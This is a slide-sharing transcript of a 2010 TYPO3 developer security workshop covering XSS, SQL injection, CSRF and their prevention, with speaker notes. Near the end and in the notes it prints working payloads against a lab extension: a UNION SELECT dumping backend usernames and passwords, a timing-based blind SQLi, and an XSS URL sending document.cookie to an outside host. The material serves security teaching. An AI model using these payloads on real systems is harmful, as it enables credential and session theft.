Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 

T3DD10 Security Workshop

  • 1. TYPO3 Developer Days - Elmshorn 2010 Inspiring Security Workshop sha
  • 2. T3DD10 Security Security flaws versus Security concepts 02.07.2010 Helmut Hummel <helmut@typo3.org>
  • 3. Introduction Do you ... Inspiring people to T3DD10 Security Workshop share
  • 4. Introduction Do you ... ... know me? Inspiring people to T3DD10 Security Workshop share
  • 5. Introduction Do you ... ... know me? ... have a working development environment? Inspiring people to T3DD10 Security Workshop share
  • 6. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? Inspiring people to T3DD10 Security Workshop share
  • 7. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? Inspiring people to T3DD10 Security Workshop share
  • 8. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? Inspiring people to T3DD10 Security Workshop share
  • 9. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? Inspiring people to T3DD10 Security Workshop share
  • 10. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? ... reported your findings to security@typo3.org? Inspiring people to T3DD10 Security Workshop share
  • 11. Did you ever hack for Inspiring people to T3DD10 Security Workshop share
  • 12. Security Flaws versus Security Concepts Agenda General Security Concepts Hacking / Code Review Session Getting into details about some vulnerabilitiy types Writing down best practices for TYPO3 developers Inspiring people to T3DD10 Security Workshop share
  • 13. What is Security? Inspiring people to T3DD10 Security Workshop share
  • 14. Security is not a state Inspiring people to T3DD10 Security Workshop share
  • 15. What is Security? Security is a process Inspiring people to T3DD10 Security Workshop share
  • 16. What is Security? Security is a process The security of an application must be proven over time Inspiring people to T3DD10 Security Workshop share
  • 17. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved Inspiring people to T3DD10 Security Workshop share
  • 18. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... Inspiring people to T3DD10 Security Workshop share
  • 19. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time Inspiring people to T3DD10 Security Workshop share
  • 20. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time The „costs“ for security must relate to the possible impacts Inspiring people to T3DD10 Security Workshop share
  • 21. What is Security? General Security Concepts Inspiring people to T3DD10 Security Workshop share
  • 22. What is Security? General Security Concepts Minimize Exposure / Least privilege Inspiring people to T3DD10 Security Workshop share
  • 23. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Inspiring people to T3DD10 Security Workshop share
  • 24. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Inspiring people to T3DD10 Security Workshop share
  • 25. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Inspiring people to T3DD10 Security Workshop share
  • 26. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Inspiring people to T3DD10 Security Workshop share
  • 27. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Inspiring people to T3DD10 Security Workshop share
  • 28. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Avoid security by obscurity Inspiring people to T3DD10 Security Workshop share
  • 29. Cross Site Scripting (XSS) Inspiring people to T3DD10 Security Workshop share
  • 30. Cross Site Scripting XSS Inspiring people to T3DD10 Security Workshop share
  • 31. Cross Site Scripting XSS Persitent/ non persistent XSS Inspiring people to T3DD10 Security Workshop share
  • 32. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Inspiring people to T3DD10 Security Workshop share
  • 33. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Inspiring people to T3DD10 Security Workshop share
  • 34. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities Inspiring people to T3DD10 Security Workshop share
  • 35. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities <img src="javascript:alert(document.cookie)" / > Inspiring people to T3DD10 Security Workshop share
  • 36. Cross Site Scripting Preventing XSS Inspiring people to T3DD10 Security Workshop share
  • 37. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Inspiring people to T3DD10 Security Workshop share
  • 38. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context Inspiring people to T3DD10 Security Workshop share
  • 39. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context <script>...NEVER PUT UNTRUSTED DATA HERE...</script> <img src=“... OR HERE ...“ /> ... because then you‘re doomed Inspiring people to T3DD10 Security Workshop share
  • 40. Email Header Injection Inspiring people to T3DD10 Security Workshop share
  • 41. Email Header Injection Email Header Injection PHP mail() function and From: header Use filter_var($mail, FILTER_VALIDATE_EMAIL) do not allow chr(10) or chr(13) Inspiring people to T3DD10 Security Workshop share
  • 42. SQL Injection (SQLi) Inspiring people to T3DD10 Security Workshop share
  • 43. SQL Injection SQLi (blind) SQL Injections Timing attacs UNION SELECT Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,user name,password,0 from be_users where admin in(1) Check your TypoScript! Inspiring people to T3DD10 Security Workshop share
  • 44. SQL Injection Prevent SQLi Inspiring people to T3DD10 Security Workshop share
  • 45. SQL Injection Prevent SQLi Prepared Statements / PDO Inspiring people to T3DD10 Security Workshop share
  • 46. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Inspiring people to T3DD10 Security Workshop share
  • 47. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Inspiring people to T3DD10 Security Workshop share
  • 48. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Using an ORM (extbase, FLOW3, QCodo, ...) Inspiring people to T3DD10 Security Workshop share
  • 49. Cross Site Request Forgery Inspiring people to T3DD10 Security Workshop share
  • 50. Cross Site Request Forgery CSRF Executing arbitrary actions on behalf of a victim <img src="http://bank.com/transfer.do? acct=MARIA&amount=100000" width="1" height="1" border="0"> stored CSRF (like XSS) Targeted Emails Requires probably some kind of social engineering Inspiring people to T3DD10 Security Workshop share
  • 51. Cross Site Request Forgery Prevent CSRF Limiting to POST and checking referrer not enough Double Submit Cookies Challenge-Response Synchronizer Token Pattern No Cross-Site Scripting (XSS) Vulnerabilities
  • 53. Application Vulnerabilities More Information Disclosure HTTP Response Splitting Path Traversal Privilege Escalation Session Fixation LPAP Injection Remote Code Execution
  • 54. T3DD10 Security Workshop Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://www.ibm.com/developerworks/ opensource/library/os-php-secure-apps/ index.html http://www.owasp.org/index.php/ Category:OWASP_WebGoat_Project Inspiring people to T3DD10 Security Workshop share
  • 55. T3DD10 Security Workshop SQLi Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi1/? no_cache=1&tx_coolextension_pi1[showUid]=1%2 0UNION%20SELECT%20uid,%20pid,%20tstamp, %20crdate,%20cruser_id,uid%20as %20t3ver_oid,uid%20as%20t3ver_id,uid%20as %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as %20t3ver_state,%20uid%20as%20t3ver_stage,uid %20as%20t3ver_count,uid%20as %20t3ver_tstamp,uid%20as%20t3_origuid,uid %20as%20sys_language_uid,uid%20as %20l10n_parent,uid%20as %20l10n_diffsource,deleted,disable%20as %20hidden,starttime,endtime,%20usergroup%20as %20fe_group,username%20as
  • 56. T3DD10 Security Workshop XSS Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3Cscript %3Ewindow.location.href+%3D+%27http%3A%2F %2Ftypo3.org%2F%3Fcookie%3D%27+%2B +document.cookie%3B%3C%2Fscript%3E
  • 57. T3DD10 Security Workshop XSS Exploit bit.ly/bpJzpF http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3C%2Fform %3E%3Cform+action%3D%22http%3A%2F %2Ftypo3.org%22%3E%3Cinput+type%3D%22text %22+name%3D%22name
  • 58.

Notas del editor

  1. Who already heard of XSS, CSRF
  3. since 2005, security since 2008, leader since end 2009
  4. since 2005, security since 2008, leader since end 2009
  5. since 2005, security since 2008, leader since end 2009
  6. since 2005, security since 2008, leader since end 2009
  7. since 2005, security since 2008, leader since end 2009
  8. since 2005, security since 2008, leader since end 2009
  9. since 2005, security since 2008, leader since end 2009
  10. since 2005, security since 2008, leader since end 2009
  13. Application Security, not personal nor gouvernmental
  15. invest in resources taken for security / potential loss when hacked =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack =&gt; Your system is secure An application must constantly be improved =&gt; As hackers and hacker tools evolve, so the security concepts have to
  16. invest in resources taken for security / potential loss when hacked =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack =&gt; Your system is secure An application must constantly be improved =&gt; As hackers and hacker tools evolve, so the security concepts have to
  17. invest in resources taken for security / potential loss when hacked =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack =&gt; Your system is secure An application must constantly be improved =&gt; As hackers and hacker tools evolve, so the security concepts have to
  18. invest in resources taken for security / potential loss when hacked =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack =&gt; Your system is secure An application must constantly be improved =&gt; As hackers and hacker tools evolve, so the security concepts have to
  19. invest in resources taken for security / potential loss when hacked =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack =&gt; Your system is secure An application must constantly be improved =&gt; As hackers and hacker tools evolve, so the security concepts have to
  20. give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User User Data: GET,POST,COOKIE, DB? Escaping is all about context Defense in depth: as many defense lines as reasonable (Gesundheitsakte) TYPO3, no private data stored in db or hd, not even images authentication through 64bit hash calculated of password all data from external db where all is encrypted (decrypted with hash) Obscurity: e.g. alternate telnet port; hide source
  21. give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User User Data: GET,POST,COOKIE, DB? Escaping is all about context Defense in depth: as many defense lines as reasonable (Gesundheitsakte) TYPO3, no private data stored in db or hd, not even images authentication through 64bit hash calculated of password all data from external db where all is encrypted (decrypted with hash) Obscurity: e.g. alternate telnet port; hide source
  22. give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User User Data: GET,POST,COOKIE, DB? Escaping is all about context Defense in depth: as many defense lines as reasonable (Gesundheitsakte) TYPO3, no private data stored in db or hd, not even images authentication through 64bit hash calculated of password all data from external db where all is encrypted (decrypted with hash) Obscurity: e.g. alternate telnet port; hide source
  23. give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User User Data: GET,POST,COOKIE, DB? Escaping is all about context Defense in depth: as many defense lines as reasonable (Gesundheitsakte) TYPO3, no private data stored in db or hd, not even images authentication through 64bit hash calculated of password all data from external db where all is encrypted (decrypted with hash) Obscurity: e.g. alternate telnet port; hide source
  24. give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User User Data: GET,POST,COOKIE, DB? Escaping is all about context Defense in depth: as many defense lines as reasonable (Gesundheitsakte) TYPO3, no private data stored in db or hd, not even images authentication through 64bit hash calculated of password all data from external db where all is encrypted (decrypted with hash) Obscurity: e.g. alternate telnet port; hide source
  25. give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User User Data: GET,POST,COOKIE, DB? Escaping is all about context Defense in depth: as many defense lines as reasonable (Gesundheitsakte) TYPO3, no private data stored in db or hd, not even images authentication through 64bit hash calculated of password all data from external db where all is encrypted (decrypted with hash) Obscurity: e.g. alternate telnet port; hide source
  26. give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User User Data: GET,POST,COOKIE, DB? Escaping is all about context Defense in depth: as many defense lines as reasonable (Gesundheitsakte) TYPO3, no private data stored in db or hd, not even images authentication through 64bit hash calculated of password all data from external db where all is encrypted (decrypted with hash) Obscurity: e.g. alternate telnet port; hide source
  28. Injecting Up: &quot;&gt; &lt;/script&gt; Injecting Down: &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt; &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;
  29. Injecting Up: &quot;&gt; &lt;/script&gt; Injecting Down: &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt; &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;
  30. Injecting Up: &quot;&gt; &lt;/script&gt; Injecting Down: &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt; &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;
  31. Injecting Up: &quot;&gt; &lt;/script&gt; Injecting Down: &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt; &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;
  32. Injecting Up: &quot;&gt; &lt;/script&gt; Injecting Down: &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt; &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;
  33. Injecting Up: &quot;&gt; &lt;/script&gt; Injecting Down: &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt; &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;
  34. Injecting Up: &quot;&gt; &lt;/script&gt; Injecting Down: &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt; &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;
  35. Input Validation: &amp;#x201E;a&gt;b&amp;#x201C; or &amp;#x201E;Me &amp; you&amp;#x201C; twitter attack Escape not easy because of the different contexts of HTML http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/ &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt; directly in a script &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt; inside an HTML comment &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt; in an attribute name &lt;...NEVER PUT UNTRUSTED DATA HERE... href=&quot;/test&quot; /&gt; in a tag name Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter
  36. Input Validation: &amp;#x201E;a&gt;b&amp;#x201C; or &amp;#x201E;Me &amp; you&amp;#x201C; twitter attack Escape not easy because of the different contexts of HTML http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/ &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt; directly in a script &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt; inside an HTML comment &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt; in an attribute name &lt;...NEVER PUT UNTRUSTED DATA HERE... href=&quot;/test&quot; /&gt; in a tag name Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter
  37. Input Validation: &amp;#x201E;a&gt;b&amp;#x201C; or &amp;#x201E;Me &amp; you&amp;#x201C; twitter attack Escape not easy because of the different contexts of HTML http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/ &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt; directly in a script &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt; inside an HTML comment &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt; in an attribute name &lt;...NEVER PUT UNTRUSTED DATA HERE... href=&quot;/test&quot; /&gt; in a tag name Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter
  41. SELECT title, description, body FROM items WHERE ID = 2 and 1=2 SELECT title, description, body FROM items WHERE ID = 2 and 1=1 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE(&apos;MSG&apos;,&apos;by 5 seconds&apos;)),null) FROM users WHERE user_id = 1; Defense in depth (saltedpw) http://localhost:8888/introductionpackage/t3dd10/pi1/?L=1%29%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0%20from%20be_users%20where%20admin%20in%281
  42. Escaping: * use the TYPO3 API for that * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary
  43. Escaping: * use the TYPO3 API for that * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary
  44. Escaping: * use the TYPO3 API for that * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary
  45. Escaping: * use the TYPO3 API for that * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary
  48. POST can be forged, referrer can be spoofed Double Submit Cookies *sending session id as cookie and form values Downsides: session hijacking, httponly for cookies not valid any more Challange-Response: *CAPTCHA *Re-Authentication (password), confirmation? alert() per javascript klickbar? *One-time Token Synchronizer Token Pattern *Generate one or more random tokens for a session (per session or per request) *randomize token variable name (per request downside: browser back button) http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
  49. Privilede Escalation Session Fixation Information Disclosure Path Traversal (Files) Remote Code Execution
  50. Privilede Escalation Session Fixation Information Disclosure Path Traversal (Files) Remote Code Execution
  51. Privilede Escalation Session Fixation Information Disclosure Path Traversal (Files) Remote Code Execution
  52. Privilede Escalation Session Fixation Information Disclosure Path Traversal (Files) Remote Code Execution
  53. Privilede Escalation Session Fixation Information Disclosure Path Traversal (Files) Remote Code Execution
  54. Privilede Escalation Session Fixation Information Disclosure Path Traversal (Files) Remote Code Execution
  55. Privilede Escalation Session Fixation Information Disclosure Path Traversal (Files) Remote Code Execution
  60. sdfasdfdsafdsafdsafasd